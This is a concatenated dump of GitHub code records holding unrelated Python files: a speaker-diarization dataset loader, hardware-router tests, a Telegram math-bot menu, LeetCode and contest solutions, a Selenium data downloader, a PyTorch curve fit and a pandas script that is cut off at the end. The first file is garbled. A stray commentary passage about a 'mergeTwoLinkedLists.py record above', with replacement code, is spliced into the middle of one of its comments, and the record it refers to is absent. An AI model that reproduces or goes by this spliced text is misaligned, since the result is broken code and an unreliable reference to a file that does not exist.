{\n 'train': ConcatDataset([\n load_dataset(\"edinburghcstr/ami\", \"ihm\", split='train', cache_dir=\"data/ami\"),\n VoxCeleb1Identification(root='data/voxceleb1', subset='train', download=True)\n ]),\n 'validation': ConcatDataset([\n load_dataset(\"edinburghcstr/ami\", \"ihm\", split='validation', cache_dir=\"data/ami\"),\n VoxCeleb1Identification(root='data/voxceleb1', subset='dev', download=True)\n ])\n}\n\n# File path to save/load the LabelEncoder\nencoder_filepath = \"data/encoder.pkl\"\n\n\ndef get_speaker_ids(example):\n if isinstance(example, tuple):\n return str(f\"voxceleb1-{example[2]}\")\n else:\n return example.get('speaker_id', 'NO_SPEAKER')\n\n\n# Check if the encoder file exists\nif os.path.isfile(encoder_filepath):\n # Load the encoder 
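The mergeTwoLinkedLists.py record above is correct but repeats the node-copying logic across four loops. A shorter equivalent using a dummy head, splicing the existing nodes instead of allocating copies (assumes the same ListNode interface defined in that record):

def merge_two_linked_lists(l1, l2):
    dummy = ListNode(0)          # placeholder head, discarded at the end
    tail = dummy
    while l1 and l2:
        if l1.value <= l2.value:
            tail.next, l1 = l1, l1.next
        else:
            tail.next, l2 = l2, l2.next
        tail = tail.next
    tail.next = l1 or l2         # attach whichever list still has nodes
    return dummy.next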
from file\n with open(encoder_filepath, \"rb\") as f:\n encoder = pickle.load(f)\nelse:\n # Create and fit a LabelEncoder to all the speaker_ids in all splits of the dataset\n encoder = LabelEncoder()\n all_speaker_ids = []\n print(\"Starting to fit the LabelEncoder...\")\n for split in dataset_dict.keys():\n # use 'NO_SPEAKER' if no speaker_id is provided\n dataset_split = dataset_dict[split]\n for example in tqdm(dataset_split, desc=f'Processing {split} dataset'):\n speaker_id = get_speaker_ids(example)\n all_speaker_ids.append(speaker_id)\n\n encoder.fit(all_speaker_ids)\n\n # Save the encoder to file\n with open(encoder_filepath, \"wb\") as f:\n pickle.dump(encoder, f)\n\n # Print the number of unique speaker_ids\n num_unique_speakers = len(set(all_speaker_ids))\n print(f\"Number of unique speaker IDs: {num_unique_speakers}\")\n\n\nclass CustomSubset(torch.utils.data.Subset):\n def __init__(self, dataset, indices):\n super().__init__(dataset, indices)\n\n def __getitem__(self, idx):\n data = self.dataset[self.indices[idx]]\n if isinstance(data, dict): # if data is a dictionary, use the key\n return data['audio']['array'], data['speaker_id']\n elif isinstance(data, tuple): # if data is a tuple, use the indices\n return data[0].flatten(), str(f\"voxceleb1-{data[2]}\")\n else:\n raise ValueError('Data type not recognized. It should be either a dictionary or a tuple.')\n\n\ndef get_dataloader(split, feature_type='melspectrogram', batch_size=4, n_mels=128,\n max_duration=20, hop_duration=15, sample_rate=16000, lite=None):\n # Check feature type and create corresponding transform\n assert feature_type in ['melspectrogram', 'mfcc'], \"Feature type must be either 'melspectrogram' or 'mfcc'\"\n if feature_type == 'melspectrogram':\n transform = torchaudio.transforms.MelSpectrogram(n_mels=n_mels).to(torch.float32)\n else:\n transform = torchaudio.transforms.MFCC(n_mfcc=n_mels).to(torch.float32)\n\n max_length_samples = int(max_duration * sample_rate)\n hop_length_samples = int(hop_duration * sample_rate)\n\n dataset = dataset_dict[split]\n\n if lite is not None:\n if split == \"train\":\n indices = list(range(lite))\n dataset = CustomSubset(dataset, indices)\n elif split == \"validation\":\n indices = list(range(lite // 4))\n dataset = CustomSubset(dataset, indices)\n\n def collate_fn(examples):\n audios = []\n speaker_ids = []\n for example in examples:\n if isinstance(example, dict): # if data is a dictionary, use the key\n audio_tensor = example['audio']['array']\n speaker_id = example['speaker_id']\n elif isinstance(example, tuple): # if data is a tuple, use the indices\n audio_tensor = example[0].flatten()\n speaker_id = str(f\"voxceleb1-{example[2]}\")\n\n # Check if the audio_tensor is a numpy array and convert to tensor if needed\n if isinstance(audio_tensor, np.ndarray):\n audio_tensor = torch.from_numpy(audio_tensor)\n\n encoded_speaker_id = encoder.transform([str(speaker_id)])[0]\n\n for start in range(0, max(1, len(audio_tensor) - max_length_samples + 1), hop_length_samples):\n end = start + max_length_samples\n segment = audio_tensor[start:end]\n # If the audio segment is shorter than max_duration, pad it\n if len(segment) < max_length_samples:\n segment = torch.nn.functional.pad(segment, (0, max_length_samples - len(segment)))\n audios.append(segment)\n speaker_ids.append(encoded_speaker_id) # Duplicate speaker_id for each segment\n\n # Convert audio list into tensor\n audios = [audio.float() for audio in audios]\n audios = torch.stack(audios)\n\n # Apply transform (MelSpectrogram 
or MFCC) to audio\n audios = transform(audios).transpose(1, 2)\n\n speaker_ids = torch.tensor(speaker_ids)\n return {\"audio_values\": audios, \"speaker_ids\": speaker_ids}\n\n dataloader = DataLoader(dataset, collate_fn=collate_fn, shuffle=True, batch_size=batch_size)\n\n return dataloader, encoder\n","repo_name":"shamoons/speaker-diarization","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"450340305","text":"import ForestedGraphComplex\nimport CHairyGraphComplex\nfrom sage.all import *\n\nfrom timeit import default_timer as timer\n\n# vs = ForestedGraphComplex.PreForestedGVS(12,7,1,0)\nfor m in range(12):\n vs = ForestedGraphComplex.ForestedGVS(12,7,m,0, True)\n # for pvs in vs.get_required_prevs():\n # pvs.build_basis()\n # vs.build_basis()\n print(m)\n print(vs.get_dimension())\n\n start = timer()\n print( sum(1 for G in vs.get_basis() if G.is_biconnected() ) )\n end = timer()\n print(end - start)\n\n start = timer()\n print( sum(1 for G in vs.get_basis() if len(list(G.bridges()))==0 ) )\n end = timer()\n print(end - start)\n\n # b2 = [G for G in b1 if G.is_biconnected() ]\n\n # b3 = [G for G in b1 if len(list(G.bridges()))==0 ]\n\n # print(len(b2), len(b3))","repo_name":"sibrun/GH","sub_path":"source/TestForested4.py","file_name":"TestForested4.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"5968668094","text":"from django.urls import path\r\nfrom LoginApp.Login import LoginHandleClass,MailNotifyClass\r\n\r\n\r\nurlpatterns =[\r\n # request html page\r\n path('index',LoginHandleClass.index),\r\n path('signin',LoginHandleClass.signin),\r\n path('register',LoginHandleClass.register),\r\n\r\n # request handle function\r\n path('query',LoginHandleClass.db_query),\r\n path('save',LoginHandleClass.db_save),\r\n \r\n #send Email \r\n path('sendmail',MailNotifyClass.notify),\r\n]\r\n \r\n","repo_name":"liroding/DockerWeb-workflowdemo","sub_path":"workflowdemo/Apps/LoginApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19487090937","text":"'''\n==========================================================================\nReqRespRouter_test.py\n==========================================================================\nTest cases for the ReqRespRouter.\n\nAuthor : Yanghui Ou\n Date : Sep 19, 2023\n'''\nimport pytest\n\nfrom pymtl3 import *\nfrom pymtl3.stdlib.stream import StreamSinkFL, StreamSourceFL\nfrom pymtl3.stdlib.test_utils import config_model_with_cmdline_opts, run_sim\n\nfrom ...ifcs.msg_types import CfgType, mk_cfg_pkt_type\nfrom ...terminal.ConfigTerminal import ConfigTerminal\nfrom ..ReqRespRouter import ReqRespRouter\n\n\naddr_nbits = 16\nTestPkt = mk_cfg_pkt_type( type_nbits=2, addr_nbits=addr_nbits, data_nbits=32 )\nwr = CfgType.WRITE\nrd = CfgType.READ\n\n\ndef mk_req_resp_msgs( lst ):\n req_msgs = [ TestPkt( type_, addr, data ) for type_, addr, data in lst[0::2] ]\n resp_msgs = [ TestPkt( type_, addr, data ) for type_, addr, data in lst[1::2] ]\n return req_msgs, resp_msgs\n\n\nclass TestRoutingLogic( Component ):\n def construct( s, PacketType, IDType, num_outports ):\n # Local parameters\n assert num_outports >= 4\n\n # Interface\n s.i_id = InPort( IDType )\n s.i_pkt = InPort( PacketType 
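The collate_fn in the dataset.py record above inlines its fixed-length windowing, which makes the padding behaviour hard to test on its own. Pulled out as a helper, the same logic reads (a sketch assuming 1-D float torch tensors and the record's pad-final-window behaviour):

import torch

def segment_audio(audio, max_len, hop_len):
    # Slice `audio` into windows of `max_len` samples every `hop_len` samples,
    # zero-padding the last (or only) short window, mirroring the record's loop.
    segments = []
    for start in range(0, max(1, len(audio) - max_len + 1), hop_len):
        seg = audio[start:start + max_len]
        if len(seg) < max_len:
            seg = torch.nn.functional.pad(seg, (0, max_len - len(seg)))
        segments.append(seg)
    return torch.stack(segments)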
)\n s.o_val = OutPort( mk_bits( num_outports ) )\n\n # Routing logic\n @update\n def up_routing_logic():\n if s.i_pkt.addr < 0x1000:\n s.o_val @= 0b1\n elif s.i_pkt.addr < 0x2000:\n s.o_val @= 0b10\n elif s.i_pkt.addr < 0x3000:\n s.o_val @= 0b100\n else:\n s.o_val @= 0b1000\n\n\ndef test_elaborate( ):\n dut = ReqRespRouter( TestPkt, mk_bits( addr_nbits ), TestRoutingLogic,\n num_terminals=4 )\n dut.apply( DefaultPassGroup() )\n dut.sim_reset()\n for _ in range(10): dut.sim_tick()\n\n\nclass TestHarness( Component ):\n def construct( s, PacketType, req_msgs, resp_msgs, num_terminals=4 ):\n s.src = StreamSourceFL( PacketType, req_msgs )\n s.sink = StreamSinkFL ( PacketType, resp_msgs, ordered=False )\n s.dut = ReqRespRouter( PacketType, mk_bits( addr_nbits ),\n TestRoutingLogic, num_terminals=num_terminals )\n s.cfg_terminals = [\n ConfigTerminal( PacketType, num_config_regs=1, num_status_regs=0 )\n for _ in range(num_terminals) ]\n\n s.src.ostream //= s.dut.minion_req\n s.sink.istream //= s.dut.minion_resp\n\n for i in range( num_terminals ):\n s.cfg_terminals[i].minion_req //= s.dut.master_req[i]\n s.cfg_terminals[i].minion_resp //= s.dut.master_resp[i]\n\n def done( s ):\n return s.src.done() and s.sink.done()\n\n def line_trace( s ):\n return s.dut.line_trace()\n\n@pytest.mark.parametrize( \"sink_delay\", [0, 20] )\ndef test_rd_wr_one_debug_unit( cmdline_opts, sink_delay ):\n req_resps = [\n (wr, 0x0000, 0xdeadbeef), (wr, 0x0000, 0),\n (rd, 0x0000, 0 ), (rd, 0x0000, 0xdeadbeef),\n ]\n req_msgs, resp_msgs = mk_req_resp_msgs( req_resps )\n th = TestHarness( TestPkt, req_msgs, resp_msgs )\n th.set_param( \"top.sink.construct\", initial_delay=sink_delay )\n config_model_with_cmdline_opts( th, cmdline_opts, duts=['dut'] )\n run_sim( th, cmdline_opts )\n assert th.cfg_terminals[0].o_config[0] == 0xdeadbeef\n\n@pytest.mark.parametrize( \"sink_delay\", [0, 20] )\ndef test_rd_wr_all_debug_unit( cmdline_opts, sink_delay ):\n req_resps = [\n # debug unit 0\n (wr, 0x0000, 0xdeadbeef), (wr, 0x0000, 0),\n (rd, 0x0000, 0 ), (rd, 0x0000, 0xdeadbeef),\n # debug unit 1\n (wr, 0x1000, 0xcafec001), (wr, 0x1000, 0),\n (rd, 0x1000, 0 ), (rd, 0x1000, 0xcafec001),\n # debug unit 2\n (wr, 0x2000, 0xbadbed00), (wr, 0x2000, 0),\n (rd, 0x2000, 0 ), (rd, 0x2000, 0xbadbed00),\n # debug unit 3\n (wr, 0x3000, 0xc01dbeef), (wr, 0x3000, 0),\n (rd, 0x3000, 0 ), (rd, 0x3000, 0xc01dbeef),\n ]\n req_msgs, resp_msgs = mk_req_resp_msgs( req_resps )\n th = TestHarness( TestPkt, req_msgs, resp_msgs )\n th.set_param( \"top.sink.construct\", initial_delay=sink_delay )\n config_model_with_cmdline_opts( th, cmdline_opts, duts=['dut'] )\n run_sim( th, cmdline_opts )\n assert th.cfg_terminals[0].o_config[0] == 0xdeadbeef\n assert th.cfg_terminals[1].o_config[0] == 0xcafec001\n assert th.cfg_terminals[2].o_config[0] == 0xbadbed00\n assert th.cfg_terminals[3].o_config[0] == 0xc01dbeef\n","repo_name":"pymtl/pymtl3-cfg","sub_path":"pymtl3_cfg/router/test/ReqRespRouter_test.py","file_name":"ReqRespRouter_test.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42224299872","text":"from aiogram.utils.markdown import bold\nfrom telebot import types\nfrom telebot.types import InlineKeyboardButton\n\n\nfrom functions import *\n\nstart_menu = [types.KeyboardButton(\"📊 Таблицы\"), types.KeyboardButton(\"📕 Формулы и теоремы\"),\n types.KeyboardButton(\"📝 Решить задачу\"), types.KeyboardButton(\"⚖ Калькулятор\")]\ntable_menu = [\n 
(InlineKeyboardButton('Таблица степеней', callback_data='table of degrees'),),\n (InlineKeyboardButton('Таблица квадратов', callback_data='table of squares'),),\n (InlineKeyboardButton('Таблица кубов', callback_data='table of cubes'),),\n (InlineKeyboardButton('Таблица формул сокращенного умножения',\n callback_data='table of abbreviated multiplication formulas'),)\n]\ncallback_data_table = ['table of degrees', 'table of squares', 'table of cubes',\n 'table of abbreviated multiplication formulas']\nformulas_and_theorems_menu = [\n (InlineKeyboardButton('Квадрат', callback_data='square'), InlineKeyboardButton('Куб', callback_data='cube')),\n (InlineKeyboardButton('Ромб', callback_data='rhomb'), InlineKeyboardButton('Пирамида', callback_data='pyramid')),\n (InlineKeyboardButton('Треугольник', callback_data='triangle'),\n InlineKeyboardButton('Параллелограмм', callback_data='parallelogram')),\n (InlineKeyboardButton('Трапеция', callback_data='trapezoid'), InlineKeyboardButton('Конус', callback_data='cone')),\n (InlineKeyboardButton('Окружность', callback_data='circle'), InlineKeyboardButton('Сфера', callback_data='sphere')),\n (InlineKeyboardButton('Прямоугольник', callback_data='rectangle'),\n InlineKeyboardButton('Параллелепипед', callback_data='parallelepiped')),\n (InlineKeyboardButton('Основные тригонометрические тождества', callback_data='basic trigonometric identities'),)\n]\ncallback_data_formulas_and_theorems = ['square', 'cube', 'rhomb', 'pyramid', 'triangle', 'parallelogram', 'trapezoid',\n 'cone', 'circle', 'sphere', 'rectangle', 'parallelepiped', 'basic trigonometric '\n 'identities']\nsolve_the_task_menu = [\n (InlineKeyboardButton('Площадь квадрата', callback_data='square area'),\n InlineKeyboardButton('Площадь прямоугольника', callback_data='rectangle area')),\n (InlineKeyboardButton('Площадь пирамиды', callback_data='pyramid area'),\n InlineKeyboardButton('Площадь трапеции', callback_data='trapezoid area')),\n (InlineKeyboardButton('Площадь ромба', callback_data='rhomb area'),\n InlineKeyboardButton('Площадь круга', callback_data='circle area')),\n (InlineKeyboardButton('Площадь прямоугольного треугольника', callback_data='area of a right triangle'),),\n (InlineKeyboardButton('Площадь параллелограмма', callback_data='parallelogram area'),),\n (InlineKeyboardButton('Площадь конуса', callback_data='area of the cone'),\n InlineKeyboardButton('Площадь цилиндра', callback_data='cylinder area'))\n]\ncallback_data_solve_the_task = {'square area': ['Площадь квадрата. \\n\\nФормула: S = a^2, где\\na - сторона квадрата.'\n '\\n\\nОтправьте длину стороны квадрата. Для нецелых чисел используйте '\n 'точку.', square_area, False],\n 'rectangle area': ['Площадь прямоугольника.\\n\\nФормула: S = a*b, где\\na '\n '- длина прямоугольника\\nb - ширина прямоугольника\\n\\n'\n 'Отправьте длину и ширину прямоугольника через запятую. Для нецелых '\n 'чисел используйте точку.', rectangle_area, False],\n 'pyramid area': ['Площадь пирамиды. \\n\\nФормула: S = a^2+2a√b^2-a^2/4, где \\na - '\n 'сторона основания пирамиды\\nb - боковое ребро пирамиды\\n\\n'\n 'Отправьте сторону основания и боковое ребро через запятую. 
'\n 'Для нецелых чисел используйте точку.', pyramid_area, False],\n 'trapezoid area': ['Площадь трапеции.\\n\\nФормулы:\\nS = (a+b)/2*h\\n'\n 'S = (a+b)/2*√(c^2-(((a-b)^2+c^2-d^2)/2*(a-b))^2)\\n'\n 'a - верхнее основание\\nb - нижнее основание\\nc и d - боковые стороны'\n '\\nh - высота непосредственно подающая с верхнего основания на нижнее.'\n '\\n\\nВыберите формулу, по которой мы решим задачу.', '', [\n (InlineKeyboardButton('S = (a+b)/2*h',\n callback_data='trapezoid area_1'),\n InlineKeyboardButton(\n 'S = (a+b)/2*√(c^2-(((a-b)^2+c^2-d^2)/2*(a-b))^2)',\n callback_data='trapezoid area_2')),\n ]],\n 'rhomb area': ['Площадь ромба.\\n\\nФормулы:\\nS = 1/2*d1*d2\\nS = ah\\nd1 и d2 - диагонали '\n 'ромба\\nh - высота ромба\\na - сторона ромба.\\n\\n'\n 'Выберите формулу, по которой мы решим задачу.',\n '', [\n (InlineKeyboardButton('S = 1/2*d1*d2',\n callback_data='rhomb area_1'),\n InlineKeyboardButton(\n 'S = ah',\n callback_data='rhomb area_2')),\n ]\n ],\n 'circle area': ['Площадь круга.\\n\\nФормула: S = π*r^2\\nπ - 3,14\\nr - радиус круга\\n\\n'\n 'Отправьте радиус круга.', circle_area, False],\n 'area of a right triangle': ['Площадь прямоугольного треугольника.\\n\\n '\n 'Формула: S=(1/2)*a*b, где а и b катеты. \\n\\n'\n 'Отправьте длину катетов через запятую.'\n 'Для нецелых чисел используйте точку.',\n area_of_a_right_triangle, False],\n 'parallelogram area': ['Площадь параллелограмма. \\n\\n'\n 'Формула: S=a*h, где a сторона, а h высота проведенная '\n 'к этой стороне. \\n\\n'\n 'Отправьте сторону и высоту через запятую. Для нецелых чисел '\n 'используйте точку.', parallelogram_area, False],\n 'area of the cone': ['Площадь конуса.\\n\\n'\n 'Формула: S=π Rl + π R^2 \\n где R радиус,'\n 'l образующая конуса\\n\\n'\n 'Отправьте радиус и образующую конуса через запятую. '\n 'Для нецелых чисел используйте точку.', area_of_the_cone, False],\n 'cylinder area': ['Площадь цилиндра.\\n\\n'\n 'Формула: S=2πR(h+R) \\n где R радиус,'\n 'h высота цилиндра\\n\\n'\n 'Отправьте радиус и высоту цилиндра через запятую.'\n 'Для нецелых чисел используйте точку.', cylinder_area, False]}\ncallback_data_solve_the_task_inside = {\n \"trapezoid area_1\": [\n 'a - верхнее основание\\nb - нижнее основание\\nh - высота непосредственно подающая с верхнего основания на'\n ' нижнее.\\n\\nОтправьте верхнее, нижнее основание и высоту через запятую. Для нецелых '\n 'чисел используйте точку.', trapezoid_area_1],\n \"trapezoid area_2\": [\n 'a - верхнее основание\\nb - нижнее основание\\nc и d - боковые стороны.\\n\\n'\n 'Отправьте верхнее, нижнее основание и боковые стороны через запятую. Для нецелых'\n 'чисел используйте точку.', trapezoid_area_2],\n \"rhomb area_1\": [\n 'd1 и d2 - диагонали ромба.'\n '\\n\\nОтправьте диагонали ромба через запятую. Для нецелых '\n 'чисел используйте точку.', rhomb_area_1],\n \"rhomb area_2\": [\n 'h - высота ромба\\na - сторона ромба.\\n\\n'\n 'Отправьте высоту и сторону ромба через запятую. 
Для нецелых'\n 'чисел используйте точку.', rhomb_area_2]\n}\ncalculator_menu = [\n (InlineKeyboardButton('Возведение в степень', callback_data='exponentiation'),),\n (InlineKeyboardButton('Логарифм', callback_data='logarithm'),\n InlineKeyboardButton('Извлечение корня', callback_data='root extraction\"'),),\n (InlineKeyboardButton('Найти НОК', callback_data='nok'),\n InlineKeyboardButton('Найти НОД', callback_data='greatest common divisor'),),\n (InlineKeyboardButton('Факториал', callback_data='factorial'),\n InlineKeyboardButton('Проценты', callback_data='percent'),)\n]\n\ncallback_data_calculator = {\n \"exponentiation\": ['Отправьте число и степень, в которую вы хотите возвести число через запятую(только не '\n 'перепутайте). Для нецелых чисел используйте точку.', exponentiation, False],\n \"logarithm\": ['Отправьте число, которое нужно в логарифм и основание логарифма через запятую(только не '\n 'перепутайте). Для нецелых чисел используйте точку.', logarithm, False],\n \"root extraction\": ['Отправьте число, которое нужно в логарифм и основание логарифма через запятую(только не '\n 'перепутайте). Для нецелых чисел используйте точку.', root_extraction, False],\n \"greatest common divisor\": ['Отправьте два числа через запятую для вычисления НОД.', greatest_common_divisor,\n False],\n \"nok\": ['Отправьте два числа через запятую для вычисления НОК.', nok, False],\n \"factorial\": ['Отправьте число для вычисления его факториала.', factorial, False],\n \"percent\": ['Выберите подходящий вариант', '', [\n (InlineKeyboardButton('Сколько составляет % от числа', callback_data='percent_2'),\n InlineKeyboardButton('Сколько % составляет число x от числа y', callback_data='percent_1'),)\n ]]\n}\n\ncallback_data_calculator_inside = {\n \"percent_1\": ['Отправьте число x и число y через запятую, для нахождения процента числа x составляет от числа y.',\n percent_1],\n \"percent_2\": ['Отправьте число и процент через запятую, для нахождения процента от данного числа.',\n percent_2]\n}\n","repo_name":"Chera1/MathematicsHelper_Bot","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":14310,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5362296361","text":"\"\"\"\nGiven two strings s and t, return the number of distinct subsequences of s which equals t.\nA string's subsequence is a new string formed from the original string by deleting some (can be none) of the characters\nwithout disturbing the remaining characters' relative positions.\n(i.e., \"ACE\" is a subsequence of \"ABCDE\" while \"AEC\" is not).\n\nExample 1:\nInput: s = \"rabbbit\", t = \"rabbit\"\nOutput: 3\nExplanation:\nAs shown below, there are 3 ways you can generate \"rabbit\" from S.\nrabbbit\nrabbbit\nrabbbit\n\nExample 2:\nInput: s = \"babgbag\", t = \"bag\"\nOutput: 5\nExplanation:\nAs shown below, there are 5 ways you can generate \"bag\" from S.\nbabgbag\nbabgbag\nbabgbag\nbabgbag\nbabgbag\n\nConstraints:\n 1 <= s.length, t.length <= 1000\n s and t consist of English letters.\n\"\"\"\n\n\ndef numDistinct(s: str, t: str) -> int:\n \"\"\"\n Use Dynamic Programming\n dp[i][j] - the number of distinct subsequences of s[0:i] which equals t[0:j]\n * if s[i] != t[j], then dp[i][j] = dp[i-1][j]; meaning if last characters are not same, s has to still use the first\n i - 1 to match t's first j\n * if s[i] == t[j], then dp[i][j] = dp[i-1][j-1] + dp[i-1][j]\n #\n \"\"\"\n m = len(s)\n n = len(t)\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n\n for i in 
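The menu.py record above maps each callback_data string to a triple of (prompt text, handler function, follow-up), where the follow-up is either False (the bot should next expect numeric input) or a list of InlineKeyboardButton rows (a sub-menu). A small dispatch sketch making that schema explicit; it assumes the record's callback_data_* dicts are in scope:

def dispatch_callback(callback_data):
    # Resolve a button press to its prompt, handler, and optional sub-menu.
    for table in (callback_data_solve_the_task, callback_data_calculator):
        if callback_data in table:
            prompt, handler, followup = table[callback_data]
            return prompt, handler, followup
    raise KeyError('unknown callback: {}'.format(callback_data))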
range(m + 1): # the \"\" is a subsequences of any string\n dp[i][0] = 1\n\n for j in range(1, n + 1):\n for i in range(j, m + 1): # s must be longer than t\n if s[i - 1] == t[j - 1]:\n dp[i][j] = dp[i - 1][j - 1] + dp[i - 1][j]\n else:\n dp[i][j] = dp[i - 1][j]\n\n return dp[m][n]\n\n\n# test cases\nprint(numDistinct(\"rabbbit\", \"rabbit\")) # 3\nprint(numDistinct(\"babgbag\", \"bag\")) # 5\nprint(numDistinct(\"b\", \"b\")) # 1\n","repo_name":"jfzhang/LeetCode","sub_path":"0115. Distinct Subsequences.py","file_name":"0115. Distinct Subsequences.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21735492542","text":"import os\nimport sys\nfrom selenium import webdriver\n\n# Setup for Firefox options\nfirefoxOptions = webdriver.FirefoxOptions()\nfirefoxOptions.set_preference(\"browser.download.folderList\", 2)\nfirefoxOptions.set_preference(\"browser.download.dir\", \"/home/davilbs/Code/gov-data-analysis\")\nfirefoxOptions.set_preference(\"browser.download.useDownloadDir\", True)\n# Disable save prompt for csv and pdf mime types\nfirefoxOptions.set_preference(\"browser.helperApps.neverAsk.saveToDisk\", \"text/csv,application/pdf\")\n# Disable inner pdf reader\nfirefoxOptions.set_preference(\"pdfjs.disabled\", True)\n\ndriver = webdriver.Firefox(options=firefoxOptions)\n\nbaseURL = \"http://www.dados.gov.br/dataset/\"\nDATASETS = [\"importacoes-e-exportacoes-de-etanol\", \n \"importacoes-gas-natural\", \n \"b-importacoes-e-exportacoes-de-petroleo\",\n \"b-importacoes-e-exportacoes-de-derivados-de-petroleo\"]\n\n# Download by clicking on the links on each page\nfor dataset in DATASETS:\n driver.get(baseURL + dataset)\n\n linkList = driver.find_elements_by_class_name(\"resource-item\")\n for link in range(1, len(linkList)):\n driver.find_element_by_xpath(\"/html/body/div[3]/div/div[3]/div/article/div/section[2]/ul/li[{}]/div/a\".format(link)).click()\n driver.find_element_by_xpath(\"/html/body/div[3]/div/div[3]/div/article/div/section[2]/ul/li[{}]/div/ul/li[2]/a\".format(link)).click()\n\n# Create directories and moves tables and pdfs\n files = os.listdir()\n importDir = os.path.join(dataset, \"importacao\")\n exportDir = os.path.join(dataset, \"exportacao\")\n if not os.path.isdir(dataset):\n os.mkdir(dataset)\n if not os.path.isdir(importDir):\n os.mkdir(importDir)\n if not os.path.isdir(exportDir):\n os.mkdir(exportDir)\n for f in files:\n if \".csv\" in f:\n if \"importacao\" in f:\n os.rename(f, os.path.join(importDir, f))\n elif \"exportacao\" in f:\n os.rename(f, os.path.join(exportDir, f))\n else:\n os.rename(f, os.path.join(dataset, f))\n if \".pdf\" in f:\n os.rename(f, os.path.join(dataset, f))\n","repo_name":"davilbs/gov-data-analysis","sub_path":"getdata.py","file_name":"getdata.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21472663249","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.autograd import Variable as var\n\ndef get_data(x,w,b,d):\n c,r = x.shape\n y = (w * x * x + b*x + d)+ (0.1*(2*np.random.rand(c,r)-1))\n return(y)\n\nxs = np.arange(0,3,0.01).reshape(-1,1)\nys = get_data(xs,1,-2,3)\n\nxs = var(torch.Tensor(xs))\nys = var(torch.Tensor(ys))\n\nprint('xs.shape: ', xs.shape)\nprint('xs.type: ', xs.type)\nprint('xs: ', xs)\n\nx = torch.tensor([8., 16, 24, 32, 48, 64, 96, 128, 192, 256, 384, 512, 768, 1024])\ny = 
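The 2-D table in the Distinct Subsequences record above can be compressed to a single row: iterating targets j in reverse lets dp[j] consume the previous row's dp[j-1] before it is overwritten. A sketch of the O(n)-space version with the same recurrence:

def num_distinct(s: str, t: str) -> int:
    n = len(t)
    dp = [1] + [0] * n            # dp[j] = ways to form t[:j] from the prefix of s seen so far
    for ch in s:
        for j in range(n, 0, -1):  # reverse so dp[j-1] still holds the previous row's value
            if t[j - 1] == ch:
                dp[j] += dp[j - 1]
    return dp[n]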
torch.tensor([8., 16, 24, 32, 48, 64, 96, 128, 192, 256, 384, 512, 768, 1024])\n# y = torch.tensor([26208396035170., 14125095233571, 9499624724564, 7332661699610, 4969123787708, 3922271353408, 2678558663290, \n# 2128286801327, 1447494492105, 1119992491206, 815502882802, 788519722917, 495173769367, 408134497783])\n\n\n# print('in_x.shape: ', in_x.shape)\n# print('in_x.reshape(-1, 1).shape: ', in_x.reshape(-1, 1).shape)\ny = y * 2\nx = x.reshape(-1, 1)\ny = y.reshape(-1, 1)\n\n\nplt.title(\"curve\")\nplt.plot(xs.data.numpy(),ys.data.numpy())\nplt.legend(\"ys\",\"ys_pre\")\nplt.show()\n\n\n\nclass Fit_model(torch.nn.Module):\n def __init__(self):\n super(Fit_model,self).__init__()\n self.linear1 = torch.nn.Linear(1,8)\n self.relu = torch.nn.ReLU()\n self.linear2 = torch.nn.Linear(8,1)\n\n self.criterion = torch.nn.MSELoss()\n self.opt = torch.optim.SGD(self.parameters(),lr=0.1)\n def forward(self, input):\n y = self.linear1(input)\n y = self.relu(y)\n y = self.linear2(y)\n return y\n\n\n\nmodel = Fit_model()\nfor e in range(80000):\n y_pre = model(x)\n\n loss = model.criterion(y_pre,y)\n if(e%10000==0):\n print(e,loss.data)\n \n # Zero gradients\n model.opt.zero_grad()\n # perform backward pass\n loss.backward()\n # update weights\n model.opt.step()\n\n\ny_pre = model(x)\nprint(x)\nprint(y)\nprint(y_pre)\n\nplt.title(\"curve\")\nplt.scatter(x.data.numpy(),y.data.numpy())\nplt.plot(x.data.numpy(),y_pre.data.numpy())\nplt.plot(x.data.numpy(),y_pre.data.numpy())\nplt.legend(\"ys\",\"ys_pre\")\nplt.show()\n","repo_name":"HPUedCSLearner/ecnu-tpf","sub_path":"pytorch/curve-fitting/curve_fit-1.py","file_name":"curve_fit-1.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"28777336726","text":"# Maximal l*r value\n# If there is clash -> with max Ri\n# If again clash there smaller index\ndef chk(a,b,n):\n max_m = 0; ind = 0\n for i in range(n):\n m = a[i] * b[i]\n if m > max_m :\n max_m = m\n ind = i\n elif m == max_m:\n if b[i] > b[ind]:\n ind = i\n return ind + 1\n\ndef main():\n t = int(input())\n while(t>0):\n try:\n t-=1\n n = int(input())\n l = list(map(int,input().split()))\n r = list(map(int,input().split()))\n print(chk(l,r,n))\n except :\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Akashcba/coding","sub_path":"Phase 1/Day 4/MOVIEWKN.py","file_name":"MOVIEWKN.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10214948845","text":"import pandas as pd\nfrom pandas.tseries.offsets import Hour, Second\ndf = pd.read_csv('~/pythonw/project1/data/citibike-tripdata.csv', sep=',')\n\n\n\n#print(df['bikeid'].value_counts())\n\nrows_count = df.shape[0]\n\nsub_count = df[df['usertype']== 'Subscriber'].shape[0]\ncus_count = df[df['usertype']== 